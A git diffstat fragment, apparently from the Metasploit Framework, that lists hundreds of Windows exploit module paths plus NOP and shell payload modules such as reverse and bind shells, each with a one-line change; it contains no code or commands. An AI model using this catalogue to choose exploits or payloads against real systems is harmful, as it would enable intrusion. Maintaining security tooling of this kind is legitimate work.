modules/exploits/windows/ftp/turboftp_port.rb | 2 +- .../exploits/windows/ftp/vermillion_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_pass.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_user.rb | 2 +- modules/exploits/windows/ftp/wftpd_size.rb | 2 +- .../exploits/windows/ftp/wing_ftp_admin_exec.rb | 2 +- .../exploits/windows/ftp/wsftp_server_503_mkd.rb | 2 +- .../exploits/windows/ftp/wsftp_server_505_xmd5.rb | 2 +- modules/exploits/windows/ftp/xftp_client_pwd.rb | 2 +- modules/exploits/windows/ftp/xlink_client.rb | 2 +- modules/exploits/windows/ftp/xlink_server.rb | 2 +- modules/exploits/windows/games/mohaa_getinfo.rb | 2 +- modules/exploits/windows/games/racer_503beta5.rb | 2 +- modules/exploits/windows/games/ut2004_secure.rb | 2 +- .../windows/http/adobe_robohelper_authbypass.rb | 2 +- .../exploits/windows/http/altn_securitygateway.rb | 2 +- modules/exploits/windows/http/altn_webadmin.rb | 2 +- .../windows/http/amlibweb_webquerydll_app.rb | 2 +- modules/exploits/windows/http/apache_chunked.rb | 2 +- .../windows/http/apache_mod_rewrite_ldap.rb | 2 +- .../exploits/windows/http/apache_modjk_overflow.rb | 2 +- .../windows/http/avaya_ccr_imageupload_exec.rb | 2 +- .../exploits/windows/http/badblue_ext_overflow.rb | 2 +- modules/exploits/windows/http/badblue_passthru.rb | 2 +- .../windows/http/bea_weblogic_jsessionid.rb | 2 +- .../exploits/windows/http/bea_weblogic_post_bof.rb | 2 +- .../windows/http/bea_weblogic_transfer_encoding.rb | 2 +- modules/exploits/windows/http/belkin_bulldog.rb | 2 +- .../windows/http/ca_arcserve_rpc_authbypass.rb | 2 +- modules/exploits/windows/http/ca_igateway_debug.rb | 2 +- .../http/ca_totaldefense_regeneratereports.rb | 2 +- .../windows/http/cogent_datahub_command.rb | 2 +- .../http/cogent_datahub_request_headers_bof.rb | 2 +- .../exploits/windows/http/coldfusion_fckeditor.rb | 2 +- modules/exploits/windows/http/cyclope_ess_sqli.rb | 2 +- .../windows/http/desktopcentral_file_upload.rb | 2 +- .../http/desktopcentral_statusupdate_upload.rb | 2 +- modules/exploits/windows/http/easyftp_list.rb | 2 +- modules/exploits/windows/http/edirectory_host.rb | 2 +- .../exploits/windows/http/edirectory_imonitor.rb | 2 +- .../windows/http/efs_easychatserver_username.rb | 2 +- .../exploits/windows/http/efs_fmws_userid_bof.rb | 2 +- modules/exploits/windows/http/ektron_xslt_exec.rb | 2 +- .../exploits/windows/http/ericom_access_now_bof.rb | 2 +- modules/exploits/windows/http/ezserver_http.rb | 2 +- modules/exploits/windows/http/fdm_auth_header.rb | 2 +- .../windows/http/generic_http_dll_injection.rb | 2 +- .../windows/http/hp_autopass_license_traversal.rb | 2 +- .../exploits/windows/http/hp_imc_bims_upload.rb | 2 +- .../exploits/windows/http/hp_imc_mibfileupload.rb | 2 +- .../windows/http/hp_loadrunner_copyfiletoserver.rb | 2 +- modules/exploits/windows/http/hp_mpa_job_acct.rb | 2 +- .../windows/http/hp_nnm_getnnmdata_hostname.rb | 2 +- .../windows/http/hp_nnm_getnnmdata_icount.rb | 2 +- .../windows/http/hp_nnm_getnnmdata_maxage.rb | 2 +- .../windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 2 +- .../windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 2 +- modules/exploits/windows/http/hp_nnm_openview5.rb | 2 +- .../exploits/windows/http/hp_nnm_ovalarm_lang.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovas.rb | 2 +- .../windows/http/hp_nnm_ovbuildpath_textfile.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebhelp.rb | 2 +- .../windows/http/hp_nnm_ovwebsnmpsrv_main.rb | 2 +- .../windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb | 2 +- .../windows/http/hp_nnm_ovwebsnmpsrv_uro.rb | 2 +- modules/exploits/windows/http/hp_nnm_snmp.rb | 2 +- .../windows/http/hp_nnm_snmpviewer_actapp.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_01.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_02.rb | 2 +- .../windows/http/hp_nnm_webappmon_execvp.rb | 2 +- .../windows/http/hp_nnm_webappmon_ovjavalocale.rb | 2 +- .../windows/http/hp_openview_insight_backdoor.rb | 2 +- .../http/hp_pcm_snac_update_certificates.rb | 2 +- .../windows/http/hp_pcm_snac_update_domain.rb | 2 +- .../windows/http/hp_power_manager_filename.rb | 2 +- .../windows/http/hp_power_manager_login.rb | 2 +- .../exploits/windows/http/hp_sitescope_dns_tool.rb | 2 +- .../windows/http/hp_sitescope_runomagentcommand.rb | 2 +- modules/exploits/windows/http/httpdx_handlepeer.rb | 2 +- .../exploits/windows/http/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/http/ia_webmail.rb | 2 +- .../windows/http/ibm_tivoli_endpoint_bof.rb | 2 +- .../exploits/windows/http/ibm_tpmfosd_overflow.rb | 2 +- .../exploits/windows/http/ibm_tsm_cad_header.rb | 2 +- modules/exploits/windows/http/icecast_header.rb | 2 +- .../exploits/windows/http/integard_password_bof.rb | 2 +- .../exploits/windows/http/intersystems_cache.rb | 2 +- modules/exploits/windows/http/intrasrv_bof.rb | 2 +- .../windows/http/ipswitch_wug_maincfgret.rb | 2 +- .../windows/http/jira_collector_traversal.rb | 2 +- modules/exploits/windows/http/kaseya_uploader.rb | 2 +- .../windows/http/kaseya_uploadimage_file_upload.rb | 2 +- modules/exploits/windows/http/kolibri_http.rb | 2 +- .../http/landesk_thinkmanagement_upload_asp.rb | 2 +- .../windows/http/lexmark_markvision_gfd_upload.rb | 2 +- .../windows/http/mailenable_auth_header.rb | 2 +- .../windows/http/manage_engine_opmanager_rce.rb | 2 +- .../windows/http/manageengine_apps_mngr.rb | 2 +- .../http/manageengine_connectionid_write.rb | 2 +- .../exploits/windows/http/maxdb_webdbm_database.rb | 2 +- .../windows/http/maxdb_webdbm_get_overflow.rb | 2 +- .../exploits/windows/http/mcafee_epolicy_source.rb | 2 +- .../windows/http/mdaemon_worldclient_form2raw.rb | 2 +- .../windows/http/minishare_get_overflow.rb | 2 +- .../exploits/windows/http/miniweb_upload_wbem.rb | 2 +- .../exploits/windows/http/navicopa_get_overflow.rb | 2 +- .../exploits/windows/http/netdecision_http_bof.rb | 2 +- modules/exploits/windows/http/netgear_nms_rce.rb | 2 +- .../windows/http/novell_imanager_upload.rb | 2 +- modules/exploits/windows/http/novell_mdm_lfi.rb | 2 +- .../windows/http/novell_messenger_acceptlang.rb | 2 +- modules/exploits/windows/http/nowsms.rb | 2 +- modules/exploits/windows/http/oracle9i_xdb_pass.rb | 2 +- .../windows/http/oracle_beehive_evaluation.rb | 2 +- .../http/oracle_beehive_prepareaudiotoplay.rb | 2 +- .../windows/http/oracle_btm_writetofile.rb | 2 +- .../exploits/windows/http/oracle_endeca_exec.rb | 2 +- .../windows/http/oracle_event_processing_upload.rb | 2 +- modules/exploits/windows/http/osb_uname_jlist.rb | 2 +- modules/exploits/windows/http/peercast_url.rb | 2 +- .../windows/http/php_apache_request_headers_bof.rb | 2 +- .../exploits/windows/http/privatewire_gateway.rb | 2 +- .../exploits/windows/http/psoproxy91_overflow.rb | 2 +- .../exploits/windows/http/rabidhamster_r4_log.rb | 2 +- modules/exploits/windows/http/rejetto_hfs_exec.rb | 2 +- .../windows/http/sambar6_search_results.rb | 2 +- .../windows/http/sap_configservlet_exec_noauth.rb | 2 +- .../windows/http/sap_host_control_cmd_exec.rb | 2 +- modules/exploits/windows/http/sapdb_webtools.rb | 2 +- .../exploits/windows/http/savant_31_overflow.rb | 2 +- .../exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +- .../exploits/windows/http/servu_session_cookie.rb | 2 +- modules/exploits/windows/http/shoutcast_format.rb | 2 +- modules/exploits/windows/http/shttpd_post.rb | 2 +- .../windows/http/solarwinds_fsm_userlogin.rb | 2 +- .../windows/http/solarwinds_storage_manager_sql.rb | 2 +- .../windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- .../exploits/windows/http/steamcast_useragent.rb | 2 +- .../exploits/windows/http/sws_connection_bof.rb | 2 +- modules/exploits/windows/http/sybase_easerver.rb | 2 +- .../exploits/windows/http/sysax_create_folder.rb | 2 +- .../windows/http/trackercam_phparg_overflow.rb | 2 +- .../exploits/windows/http/trackit_file_upload.rb | 2 +- .../exploits/windows/http/trendmicro_officescan.rb | 2 +- modules/exploits/windows/http/ultraminihttp_bof.rb | 2 +- .../exploits/windows/http/umbraco_upload_aspx.rb | 2 +- .../http/vmware_vcenter_chargeback_upload.rb | 2 +- modules/exploits/windows/http/webster_http.rb | 2 +- .../windows/http/xampp_webdav_upload_php.rb | 2 +- .../exploits/windows/http/xitami_if_mod_since.rb | 2 +- .../http/zenworks_assetmgmt_uploadservlet.rb | 2 +- .../windows/http/zenworks_uploadservlet.rb | 2 +- .../exploits/windows/iis/iis_webdav_upload_asp.rb | 2 +- modules/exploits/windows/iis/ms01_023_printer.rb | 2 +- modules/exploits/windows/iis/ms01_026_dbldecode.rb | 2 +- modules/exploits/windows/iis/ms01_033_idq.rb | 2 +- modules/exploits/windows/iis/ms02_018_htr.rb | 2 +- modules/exploits/windows/iis/ms02_065_msadc.rb | 2 +- .../exploits/windows/iis/ms03_007_ntdll_webdav.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 2 +- modules/exploits/windows/imap/eudora_list.rb | 2 +- modules/exploits/windows/imap/imail_delete.rb | 2 +- modules/exploits/windows/imap/ipswitch_search.rb | 2 +- modules/exploits/windows/imap/mailenable_login.rb | 2 +- modules/exploits/windows/imap/mailenable_status.rb | 2 +- .../exploits/windows/imap/mailenable_w3c_select.rb | 2 +- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 2 +- modules/exploits/windows/imap/mdaemon_fetch.rb | 2 +- .../windows/imap/mercur_imap_select_overflow.rb | 2 +- modules/exploits/windows/imap/mercur_login.rb | 2 +- modules/exploits/windows/imap/mercury_login.rb | 2 +- modules/exploits/windows/imap/mercury_rename.rb | 2 +- .../exploits/windows/imap/novell_netmail_append.rb | 2 +- .../exploits/windows/imap/novell_netmail_auth.rb | 2 +- .../exploits/windows/imap/novell_netmail_status.rb | 2 +- .../windows/imap/novell_netmail_subscribe.rb | 2 +- .../exploits/windows/isapi/ms00_094_pbserver.rb | 2 +- .../windows/isapi/ms03_022_nsiislog_post.rb | 2 +- .../windows/isapi/ms03_051_fp30reg_chunked.rb | 2 +- .../windows/isapi/rsa_webagent_redirect.rb | 2 +- modules/exploits/windows/isapi/w3who_query.rb | 2 +- modules/exploits/windows/ldap/imail_thc.rb | 2 +- modules/exploits/windows/ldap/pgp_keyserver7.rb | 2 +- .../windows/license/calicclnt_getconfig.rb | 2 +- .../windows/license/calicserv_getconfig.rb | 2 +- .../exploits/windows/license/flexnet_lmgrd_bof.rb | 2 +- .../exploits/windows/license/sentinel_lm7_udp.rb | 2 +- .../windows/local/adobe_sandbox_adobecollabsync.rb | 2 +- .../exploits/windows/local/agnitum_outpost_acs.rb | 2 +- .../windows/local/always_install_elevated.rb | 2 +- modules/exploits/windows/local/applocker_bypass.rb | 2 +- modules/exploits/windows/local/ask.rb | 2 +- modules/exploits/windows/local/bthpan.rb | 2 +- modules/exploits/windows/local/bypassuac.rb | 2 +- .../exploits/windows/local/bypassuac_injection.rb | 2 +- modules/exploits/windows/local/bypassuac_vbs.rb | 2 +- .../exploits/windows/local/current_user_psexec.rb | 2 +- modules/exploits/windows/local/ikeext_service.rb | 2 +- modules/exploits/windows/local/ipass_launch_app.rb | 2 +- .../exploits/windows/local/lenovo_systemupdate.rb | 2 +- modules/exploits/windows/local/mqac_write.rb | 2 +- .../exploits/windows/local/ms10_015_kitrap0d.rb | 2 +- .../exploits/windows/local/ms10_092_schelevator.rb | 2 +- .../exploits/windows/local/ms11_080_afdjoinleaf.rb | 2 +- .../windows/local/ms13_005_hwnd_broadcast.rb | 2 +- .../exploits/windows/local/ms13_053_schlamperei.rb | 2 +- .../windows/local/ms13_081_track_popup_menu.rb | 2 +- .../windows/local/ms13_097_ie_registry_symlink.rb | 2 +- .../exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 +- .../windows/local/ms14_058_track_popup_menu.rb | 2 +- .../exploits/windows/local/ms14_070_tcpip_ioctl.rb | 2 +- .../exploits/windows/local/ms15_004_tswbproxy.rb | 2 +- .../windows/local/ms15_051_client_copy_image.rb | 2 +- .../exploits/windows/local/ms15_078_atmfd_bof.rb | 2 +- modules/exploits/windows/local/ms_ndproxy.rb | 2 +- .../exploits/windows/local/novell_client_nicm.rb | 2 +- .../exploits/windows/local/novell_client_nwfs.rb | 2 +- .../windows/local/ntapphelpcachecontrol.rb | 2 +- modules/exploits/windows/local/nvidia_nvsvc.rb | 2 +- modules/exploits/windows/local/payload_inject.rb | 2 +- modules/exploits/windows/local/persistence.rb | 2 +- .../windows/local/powershell_cmd_upgrade.rb | 2 +- .../exploits/windows/local/powershell_remoting.rb | 2 +- modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +- modules/exploits/windows/local/pxeexploit.rb | 2 +- .../exploits/windows/local/registry_persistence.rb | 2 +- modules/exploits/windows/local/run_as.rb | 2 +- modules/exploits/windows/local/s4u_persistence.rb | 2 +- .../exploits/windows/local/service_permissions.rb | 2 +- .../exploits/windows/local/trusted_service_path.rb | 2 +- .../windows/local/virtual_box_guest_additions.rb | 2 +- .../windows/local/virtual_box_opengl_escape.rb | 2 +- modules/exploits/windows/local/vss_persistence.rb | 2 +- modules/exploits/windows/local/wmi.rb | 2 +- .../windows/lotus/domino_http_accept_language.rb | 2 +- .../windows/lotus/domino_icalendar_organizer.rb | 2 +- .../windows/lotus/domino_sametime_stmux.rb | 2 +- modules/exploits/windows/lotus/lotusnotes_lzh.rb | 2 +- modules/exploits/windows/lpd/hummingbird_exceed.rb | 2 +- modules/exploits/windows/lpd/niprint.rb | 2 +- modules/exploits/windows/lpd/saplpd.rb | 2 +- modules/exploits/windows/lpd/wincomlpd_admin.rb | 2 +- modules/exploits/windows/misc/achat_bof.rb | 2 +- .../exploits/windows/misc/actfax_raw_server_bof.rb | 2 +- .../windows/misc/agentxpp_receive_agentx.rb | 2 +- .../exploits/windows/misc/allmediaserver_bof.rb | 2 +- modules/exploits/windows/misc/altiris_ds_sqli.rb | 2 +- .../windows/misc/apple_quicktime_rtsp_response.rb | 2 +- .../windows/misc/asus_dpcproxy_overflow.rb | 2 +- .../windows/misc/avaya_winpmd_unihostrouter.rb | 2 +- .../exploits/windows/misc/avidphoneticindexer.rb | 2 +- .../exploits/windows/misc/bakbone_netvault_heap.rb | 2 +- modules/exploits/windows/misc/bcaaa_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server.rb | 2 +- modules/exploits/windows/misc/bigant_server_250.rb | 2 +- .../windows/misc/bigant_server_dupf_upload.rb | 2 +- .../windows/misc/bigant_server_sch_dupf_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server_usv.rb | 2 +- .../exploits/windows/misc/bomberclone_overflow.rb | 2 +- modules/exploits/windows/misc/bopup_comm.rb | 2 +- modules/exploits/windows/misc/borland_interbase.rb | 2 +- modules/exploits/windows/misc/borland_starteam.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess.rb | 2 +- .../windows/misc/citrix_streamprocess_data_msg.rb | 2 +- ...citrix_streamprocess_get_boot_record_request.rb | 2 +- .../misc/citrix_streamprocess_get_footer.rb | 2 +- .../misc/citrix_streamprocess_get_objects.rb | 2 +- modules/exploits/windows/misc/doubletake.rb | 2 +- modules/exploits/windows/misc/eiqnetworks_esa.rb | 2 +- .../windows/misc/eiqnetworks_esa_topology.rb | 2 +- .../windows/misc/enterasys_netsight_syslog_bof.rb | 2 +- modules/exploits/windows/misc/eureka_mail_err.rb | 2 +- modules/exploits/windows/misc/fb_cnct_group.rb | 2 +- .../windows/misc/fb_isc_attach_database.rb | 2 +- .../windows/misc/fb_isc_create_database.rb | 2 +- modules/exploits/windows/misc/fb_svc_attach.rb | 2 +- modules/exploits/windows/misc/gimp_script_fu.rb | 2 +- .../windows/misc/hp_dataprotector_cmd_exec.rb | 2 +- .../exploits/windows/misc/hp_dataprotector_crs.rb | 2 +- .../windows/misc/hp_dataprotector_dtbclslogin.rb | 2 +- .../windows/misc/hp_dataprotector_exec_bar.rb | 2 +- .../windows/misc/hp_dataprotector_new_folder.rb | 2 +- .../windows/misc/hp_dataprotector_traversal.rb | 2 +- modules/exploits/windows/misc/hp_imc_uam.rb | 2 +- .../windows/misc/hp_loadrunner_magentproc.rb | 2 +- modules/exploits/windows/misc/hp_magentservice.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_1.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_2.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_3.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_4.rb | 2 +- .../windows/misc/hp_operations_agent_coda_34.rb | 2 +- .../windows/misc/hp_operations_agent_coda_8c.rb | 2 +- modules/exploits/windows/misc/hp_ovtrace.rb | 2 +- .../windows/misc/ib_isc_attach_database.rb | 2 +- .../windows/misc/ib_isc_create_database.rb | 2 +- modules/exploits/windows/misc/ib_svc_attach.rb | 2 +- .../windows/misc/ibm_cognos_tm1admsd_bof.rb | 2 +- .../windows/misc/ibm_director_cim_dllinject.rb | 2 +- modules/exploits/windows/misc/ibm_tsm_cad_ping.rb | 2 +- .../windows/misc/ibm_tsm_rca_dicugetidentify.rb | 2 +- modules/exploits/windows/misc/itunes_extm3u_bof.rb | 2 +- modules/exploits/windows/misc/landesk_aolnsrvr.rb | 2 +- modules/exploits/windows/misc/lianja_db_net.rb | 2 +- .../misc/manageengine_eventlog_analyzer_rce.rb | 2 +- modules/exploits/windows/misc/mercury_phonebook.rb | 2 +- modules/exploits/windows/misc/mini_stream.rb | 2 +- .../exploits/windows/misc/mirc_privmsg_server.rb | 2 +- modules/exploits/windows/misc/ms07_064_sami.rb | 2 +- .../exploits/windows/misc/ms10_104_sharepoint.rb | 2 +- modules/exploits/windows/misc/netcat110_nt.rb | 2 +- modules/exploits/windows/misc/nettransport.rb | 2 +- modules/exploits/windows/misc/nvidia_mental_ray.rb | 2 +- modules/exploits/windows/misc/poisonivy_bof.rb | 2 +- modules/exploits/windows/misc/poppeeper_date.rb | 2 +- modules/exploits/windows/misc/poppeeper_uidl.rb | 2 +- modules/exploits/windows/misc/realtek_playlist.rb | 2 +- modules/exploits/windows/misc/sap_2005_license.rb | 2 +- .../windows/misc/sap_netweaver_dispatcher.rb | 2 +- modules/exploits/windows/misc/shixxnote_font.rb | 2 +- .../solidworks_workgroup_pdmwservice_file_write.rb | 2 +- .../exploits/windows/misc/splayer_content_type.rb | 2 +- modules/exploits/windows/misc/stream_down_bof.rb | 2 +- .../exploits/windows/misc/talkative_response.rb | 2 +- .../exploits/windows/misc/tiny_identd_overflow.rb | 2 +- .../misc/trendmicro_cmdprocessor_addtask.rb | 2 +- modules/exploits/windows/misc/ufo_ai.rb | 2 +- modules/exploits/windows/misc/windows_rsh.rb | 2 +- modules/exploits/windows/misc/wireshark_lua.rb | 2 +- .../exploits/windows/misc/wireshark_packet_dect.rb | 2 +- .../windows/mmsp/ms10_025_wmss_connect_funnel.rb | 2 +- .../windows/motorola/timbuktu_fileupload.rb | 2 +- .../windows/mssql/lyris_listmanager_weak_pass.rb | 2 +- modules/exploits/windows/mssql/ms02_039_slammer.rb | 2 +- modules/exploits/windows/mssql/ms02_056_hello.rb | 2 +- .../windows/mssql/ms09_004_sp_replwritetovarbin.rb | 2 +- .../mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 2 +- .../exploits/windows/mssql/mssql_linkcrawler.rb | 2 +- modules/exploits/windows/mssql/mssql_payload.rb | 2 +- .../exploits/windows/mssql/mssql_payload_sqli.rb | 2 +- modules/exploits/windows/mysql/mysql_mof.rb | 2 +- modules/exploits/windows/mysql/mysql_payload.rb | 2 +- modules/exploits/windows/mysql/mysql_start_up.rb | 2 +- .../exploits/windows/mysql/mysql_yassl_hello.rb | 2 +- .../windows/mysql/scrutinizer_upload_exec.rb | 2 +- modules/exploits/windows/nfs/xlink_nfsd.rb | 2 +- modules/exploits/windows/nntp/ms05_030_nntp.rb | 2 +- .../windows/novell/file_reporter_fsfui_upload.rb | 2 +- .../windows/novell/groupwisemessenger_client.rb | 2 +- modules/exploits/windows/novell/netiq_pum_eval.rb | 2 +- modules/exploits/windows/novell/nmap_stor.rb | 2 +- .../windows/novell/zenworks_desktop_agent.rb | 2 +- .../windows/novell/zenworks_preboot_op21_bof.rb | 2 +- .../windows/novell/zenworks_preboot_op4c_bof.rb | 2 +- .../windows/novell/zenworks_preboot_op6_bof.rb | 2 +- .../windows/novell/zenworks_preboot_op6c_bof.rb | 2 +- .../oracle/client_system_analyzer_upload.rb | 2 +- modules/exploits/windows/oracle/extjob.rb | 2 +- modules/exploits/windows/oracle/osb_ndmp_auth.rb | 2 +- modules/exploits/windows/oracle/tns_arguments.rb | 2 +- .../exploits/windows/oracle/tns_auth_sesskey.rb | 2 +- .../exploits/windows/oracle/tns_service_name.rb | 2 +- modules/exploits/windows/pop3/seattlelab_pass.rb | 2 +- .../exploits/windows/postgres/postgres_payload.rb | 2 +- .../windows/proxy/bluecoat_winproxy_host.rb | 2 +- .../exploits/windows/proxy/ccproxy_telnet_ping.rb | 2 +- .../exploits/windows/proxy/proxypro_http_get.rb | 2 +- .../windows/proxy/qbik_wingate_wwwproxy.rb | 2 +- modules/exploits/windows/scada/abb_wserver_exec.rb | 2 +- .../exploits/windows/scada/citect_scada_odbc.rb | 2 +- .../scada/codesys_gateway_server_traversal.rb | 2 +- .../exploits/windows/scada/codesys_web_server.rb | 2 +- modules/exploits/windows/scada/daq_factory_bof.rb | 2 +- .../windows/scada/factorylink_csservice.rb | 2 +- .../exploits/windows/scada/factorylink_vrn_09.rb | 2 +- .../windows/scada/ge_proficy_cimplicity_gefebt.rb | 2 +- .../exploits/windows/scada/iconics_genbroker.rb | 2 +- .../windows/scada/iconics_webhmi_setactivexguid.rb | 2 +- .../windows/scada/igss9_igssdataserver_listall.rb | 2 +- .../windows/scada/igss9_igssdataserver_rename.rb | 2 +- modules/exploits/windows/scada/igss9_misc.rb | 2 +- modules/exploits/windows/scada/igss_exec_17.rb | 2 +- .../windows/scada/indusoft_webstudio_exec.rb | 2 +- modules/exploits/windows/scada/moxa_mdmtool.rb | 2 +- .../exploits/windows/scada/procyon_core_server.rb | 2 +- modules/exploits/windows/scada/realwin.rb | 2 +- .../windows/scada/realwin_on_fc_binfile_a.rb | 2 +- .../exploits/windows/scada/realwin_on_fcs_login.rb | 2 +- .../windows/scada/realwin_scpc_initialize.rb | 2 +- .../windows/scada/realwin_scpc_initialize_rf.rb | 2 +- .../windows/scada/realwin_scpc_txtevent.rb | 2 +- modules/exploits/windows/scada/scadapro_cmdexe.rb | 2 +- .../windows/scada/sunway_force_control_netdbsrv.rb | 2 +- modules/exploits/windows/scada/winlog_runtime.rb | 2 +- modules/exploits/windows/scada/winlog_runtime_2.rb | 2 +- .../windows/scada/yokogawa_bkbcopyd_bof.rb | 2 +- .../windows/scada/yokogawa_bkesimmgr_bof.rb | 2 +- .../exploits/windows/scada/yokogawa_bkfsim_vhfd.rb | 2 +- .../exploits/windows/scada/yokogawa_bkhodeq_bof.rb | 2 +- modules/exploits/windows/sip/aim_triton_cseq.rb | 2 +- modules/exploits/windows/sip/sipxezphone_cseq.rb | 2 +- modules/exploits/windows/sip/sipxphone_cseq.rb | 2 +- .../windows/smb/generic_smb_dll_injection.rb | 2 +- .../exploits/windows/smb/group_policy_startup.rb | 2 +- modules/exploits/windows/smb/ipass_pipe_exec.rb | 2 +- modules/exploits/windows/smb/ms03_049_netapi.rb | 2 +- modules/exploits/windows/smb/ms04_007_killbill.rb | 2 +- modules/exploits/windows/smb/ms04_011_lsass.rb | 2 +- modules/exploits/windows/smb/ms04_031_netdde.rb | 2 +- modules/exploits/windows/smb/ms05_039_pnp.rb | 2 +- .../exploits/windows/smb/ms06_025_rasmans_reg.rb | 2 +- modules/exploits/windows/smb/ms06_025_rras.rb | 2 +- modules/exploits/windows/smb/ms06_040_netapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwwks.rb | 2 +- modules/exploits/windows/smb/ms06_070_wkssvc.rb | 2 +- .../windows/smb/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- .../smb/ms09_050_smb2_negotiate_func_index.rb | 2 +- .../smb/ms10_046_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/smb/ms10_061_spoolss.rb | 2 +- .../smb/ms15_020_shortcut_icon_dllloader.rb | 2 +- .../windows/smb/netidentity_xtierrpcpipe.rb | 2 +- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- modules/exploits/windows/smb/smb_relay.rb | 2 +- .../windows/smb/timbuktu_plughntcommand_bof.rb | 2 +- .../exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 2 +- modules/exploits/windows/smtp/mercury_cram_md5.rb | 2 +- .../windows/smtp/ms03_046_exchange2000_xexch50.rb | 2 +- modules/exploits/windows/smtp/njstar_smtp_bof.rb | 2 +- modules/exploits/windows/smtp/wmailserver.rb | 2 +- modules/exploits/windows/smtp/ypops_overflow1.rb | 2 +- .../exploits/windows/ssh/freeftpd_key_exchange.rb | 2 +- .../exploits/windows/ssh/freesshd_authbypass.rb | 2 +- .../exploits/windows/ssh/freesshd_key_exchange.rb | 2 +- modules/exploits/windows/ssh/putty_msg_debug.rb | 2 +- modules/exploits/windows/ssh/securecrt_ssh1.rb | 2 +- modules/exploits/windows/ssh/sysax_ssh_username.rb | 2 +- modules/exploits/windows/ssl/ms04_011_pct.rb | 2 +- .../windows/telnet/gamsoft_telsrv_username.rb | 2 +- modules/exploits/windows/telnet/goodtech_telnet.rb | 2 +- .../exploits/windows/tftp/attftp_long_filename.rb | 2 +- .../windows/tftp/distinct_tftp_traversal.rb | 2 +- .../exploits/windows/tftp/dlink_long_filename.rb | 2 +- .../windows/tftp/futuresoft_transfermode.rb | 2 +- .../windows/tftp/netdecision_tftp_traversal.rb | 2 +- .../exploits/windows/tftp/opentftp_error_code.rb | 2 +- .../exploits/windows/tftp/quick_tftp_pro_mode.rb | 2 +- .../exploits/windows/tftp/tftpd32_long_filename.rb | 2 +- .../windows/tftp/tftpdwin_long_filename.rb | 2 +- .../exploits/windows/tftp/tftpserver_wrq_bof.rb | 2 +- .../windows/tftp/threectftpsvc_long_mode.rb | 2 +- .../exploits/windows/unicenter/cam_log_security.rb | 2 +- modules/exploits/windows/vnc/realvnc_client.rb | 2 +- modules/exploits/windows/vnc/ultravnc_client.rb | 2 +- .../exploits/windows/vnc/ultravnc_viewer_bof.rb | 2 +- modules/exploits/windows/vnc/winvnc_http_get.rb | 2 +- modules/exploits/windows/vpn/safenet_ike_11.rb | 2 +- .../exploits/windows/winrm/winrm_script_exec.rb | 2 +- modules/exploits/windows/wins/ms04_045_wins.rb | 2 +- modules/nops/armle/simple.rb | 2 +- modules/nops/php/generic.rb | 2 +- modules/nops/ppc/simple.rb | 2 +- modules/nops/sparc/random.rb | 2 +- modules/nops/tty/generic.rb | 2 +- modules/nops/x64/simple.rb | 2 +- modules/nops/x86/opty2.rb | 2 +- modules/nops/x86/single_byte.rb | 2 +- modules/payloads/singles/aix/ppc/shell_bind_tcp.rb | 2 +- .../payloads/singles/aix/ppc/shell_find_port.rb | 2 +- modules/payloads/singles/aix/ppc/shell_interact.rb | 2 +- .../payloads/singles/aix/ppc/shell_reverse_tcp.rb | 2 +- .../payloads/singles/bsd/sparc/shell_bind_tcp.rb | 2 +- .../singles/bsd/sparc/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/bsd/x64/exec.rb | 2 +- .../singles/bsd/x64/shell_bind_ipv6_tcp.rb | 2 +- modules/payloads/singles/bsd/x64/shell_bind_tcp.rb | 2 +- .../singles/bsd/x64/shell_bind_tcp_small.rb | 2 +- .../singles/bsd/x64/shell_reverse_ipv6_tcp.rb | 2 +- .../payloads/singles/bsd/x64/shell_reverse_tcp.rb | 2 +- .../singles/bsd/x64/shell_reverse_tcp_small.rb | 2 +- modules/payloads/singles/bsd/x86/exec.rb | 2 +- .../payloads/singles/bsd/x86/metsvc_bind_tcp.rb | 2 +- .../payloads/singles/bsd/x86/metsvc_reverse_tcp.rb | 2 +- modules/payloads/singles/bsd/x86/shell_bind_tcp.rb | 2 +- .../singles/bsd/x86/shell_bind_tcp_ipv6.rb | 2 +- .../payloads/singles/bsd/x86/shell_find_port.rb | 2 +- modules/payloads/singles/bsd/x86/shell_find_tag.rb | 2 +- .../payloads/singles/bsd/x86/shell_reverse_tcp.rb | 2 +- .../singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 2 +- .../payloads/singles/bsdi/x86/shell_bind_tcp.rb | 2 +- .../payloads/singles/bsdi/x86/shell_find_port.rb | 2 +- .../payloads/singles/bsdi/x86/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/cmd/unix/bind_awk.rb | 2 +- modules/payloads/singles/cmd/unix/bind_inetd.rb | 2 +- modules/payloads/singles/cmd/unix/bind_lua.rb | 2 +- modules/payloads/singles/cmd/unix/bind_netcat.rb | 2 +- .../singles/cmd/unix/bind_netcat_gaping.rb | 2 +- .../singles/cmd/unix/bind_netcat_gaping_ipv6.rb | 2 +- modules/payloads/singles/cmd/unix/bind_nodejs.rb | 2 +- 